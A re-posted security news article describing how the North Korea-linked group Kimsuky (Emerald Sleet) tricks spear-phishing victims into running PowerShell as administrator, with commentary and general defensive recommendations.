North Korean Hackers Use New Tactics to Exploit PowerShell for Cyber Espionage

By /

Listen to this Post

2025-02-16

Emerald Sleet’s Latest Strategy in Cyber Attacks

Microsoft Threat Intelligence researchers have identified a new tactic employed by North Korea-linked cyber espionage group Emerald Sleet (also known as Kimsuky, VELVET CHOLLIMA, and APT43). The hackers are now tricking targets into manually running PowerShell as an administrator, allowing them to execute malicious code.

Kimsuky has been active since at least 2013, operating under North Korea’s Reconnaissance General Bureau (RGB). The group primarily targets think tanks, government agencies, and research organizations in South Korea, the United States, Europe, and Russia. Their latest attack method involves spear-phishing campaigns where they impersonate South Korean government officials to build trust with their targets.

The attack unfolds as follows:

  1. A phishing email is sent with a bait PDF attachment.
  2. The victim is lured into clicking a URL, which directs them to register their device.
  3. The page instructs them to open PowerShell as an administrator and paste a malicious script provided by the hackers.
  4. This script downloads and installs a browser-based remote desktop tool, allowing attackers to take control of the system.
  5. A certificate file with a hardcoded PIN is retrieved from a remote server, facilitating device registration.
  6. Once registered, the hackers can exfiltrate sensitive data and gain persistent access to the system.

Microsoft has observed this tactic in limited attacks since January 2025, but warns that it signals a strategic evolution in Kimsuky’s espionage operations. The company is actively notifying targeted customers and advises organizations to train employees on phishing threats while using attack surface reduction (ASR) rules to mitigate risks.

Separately, researchers at AhnLab Security Intelligence Center (ASEC) recently discovered Kimsuky using forceCopy info-stealer malware via malicious LNK shortcut files disguised as Office documents. These execute PowerShell or Mshta to install PebbleDash malware, RDP Wrapper, and proxy tools for remote access and stealthy data exfiltration.

What Undercode Say:

A Strategic Shift in Cyber Espionage

Kimsuky’s latest PowerShell-based attack represents a dangerous evolution in cyber warfare. Unlike traditional phishing attacks that rely on malware-laden attachments, this technique manipulates human behavior—convincing victims to run malicious commands themselves. This approach:

  • Bypasses many traditional security defenses since there’s no automatic execution of malware.
  • Leverages user privilege escalation, tricking victims into giving the hackers administrative control.
  • Avoids signature-based detection as the attack relies on scripting rather than precompiled executables.

PowerShell as a Double-Edged Sword

PowerShell is an essential tool for IT administrators, but its capabilities make it a prime target for exploitation. The way Emerald Sleet abuses PowerShell mirrors techniques used by other APT groups, such as APT29 (Cozy Bear) and Lazarus Group. Security teams should:

  • Restrict PowerShell execution policies to prevent unauthorized scripts.

– Monitor PowerShell logs to detect suspicious activity.

  • Implement Just Enough Administration (JEA) to limit what PowerShell commands users can execute.

Why This Attack is Highly Effective

This method is psychologically sophisticated. By impersonating a South Korean official, the hackers establish a level of trust with their targets. Many victims may blindly follow instructions, believing they are performing an official task. This is especially dangerous for:

– Government employees handling classified data.

  • Researchers and think tanks working on geopolitical issues.
  • Corporate executives with access to sensitive intellectual property.

The attack also introduces a stealthy persistence mechanism by registering the victim’s device using a certificate and PIN. This suggests that Emerald Sleet is moving towards more resilient long-term access methods, making detection and remediation more difficult.

The Bigger Picture: North Korea’s Cyber Strategy

North Korea’s hacking groups, including Kimsuky, Lazarus, and APT38, are known for:

– Espionage-focused cyber operations targeting geopolitical intelligence.

  • Financial cybercrimes to fund state operations (e.g., cryptocurrency theft).

– Disruptive attacks against political adversaries.

Kimsuky’s primary mission appears to be gathering intelligence on political and military affairs, particularly concerning South Korea and its allies. This aligns with North Korea’s broader efforts to counter Western influence through cyber warfare.

Mitigation Strategies for Organizations

To defend against this evolving threat, organizations must:

  1. Enhance phishing awareness training—Educate employees about sophisticated social engineering techniques.
  2. Limit administrative privileges—Ensure that only IT personnel can run PowerShell with elevated privileges.
  3. Deploy endpoint detection and response (EDR) solutions—Monitor for unusual PowerShell activity.
  4. Use strong identity verification—Multi-factor authentication (MFA) can prevent unauthorized access.
  5. Implement network segmentation—Limit lateral movement if an attacker gains access.

Conclusion

Kimsuky’s new PowerShell-based attack is an alarming development in cyber espionage.

References:

Reported By: https://securityaffairs.com/174142/apt/emerald-sleet-is-using-a-new-tactic.html
https://www.twitter.com
Wikipedia: https://www.wikipedia.org
Undercode AI: https://ai.undercodetesting.com

Image Source:

OpenAI: https://craiyon.com
Undercode AI DI v2: https://ai.undercode.helpFeatured Image

Explore More: